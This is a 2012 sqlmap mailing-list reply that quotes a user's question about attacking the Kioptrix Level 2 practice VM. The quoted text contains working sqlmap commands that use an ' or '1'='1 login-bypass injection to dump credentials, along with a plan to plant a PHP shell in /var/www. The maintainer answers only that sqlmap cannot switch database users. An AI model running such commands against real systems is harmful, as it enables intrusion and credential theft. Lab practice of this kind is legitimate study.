Re: [sqlmap-users] escalating privileges
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] escalating privileges
|
From: Miroslav S. <mir...@gm...> - 2012-01-13 12:39:38
|
Hi Phaedrus. Sorry, for the time being there is no such mechanism inside sqlmap. Also, once implemented it will be most certainly limited to only MSSQL and Oracle ( http://www.abysssec.com/blog/2008/10/16/ms-sql-injection-privilege-scalation/& http://www.notsosecure.com/folder2/2009/04/26/oracle-privilege-escalations-from-web-app/ ). Kind regards, Miroslav Stampar On Fri, Jan 13, 2012 at 5:02 AM, Phaedrus Black <pha...@gm...>wrote: > hello: > > I discovered a vulnerability that allows me to bypass the login screen. > btw this is the Kioptrix Level 2 puzzle and not a live client/target. > > I've managed to dump credentials for the administrator's web interface in > addition to the database users themselves. There were a few recon commands > but the meatiest items are below. > > Specific commands included: > > >sudo python sqlmap.py -u "http://1 <http://172.16.207.129>92.168.1.1" > --data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3 > --string="Ping" -D webapp -T users --dump --proxy=http://127.0.0.1:8080 <--- > gets me user credentials for the webapp > > >sudo python sqlmap.py -u "http://1 <http://172.16.207.129>92.168.1.1" > --data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3 > --string="Ping" --passwords --proxy=http://127.0.0.1:8080 <--- gets me > user credentials for the DB. > > However, I've discovered that the db user that I am running as does > **not** have the appropriate privileges to write > files to the system. > > My objective is to write something like phpshell to the /var/www directory > and go from there. > > Is there a way for sqlmap to switch from unprivileged user A to privileged > user B if I have both sets of credentials? If so, I can then use the > "file-write" and "file-dest" options. > > thanks, > > -pb > > > > > > > ------------------------------------------------------------------------------ > RSA(R) Conference 2012 > Mar 27 - Feb 2 > Save $400 by Jan. 27 > Register now! > http://p.sf.net/sfu/rsa-sfdev2dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
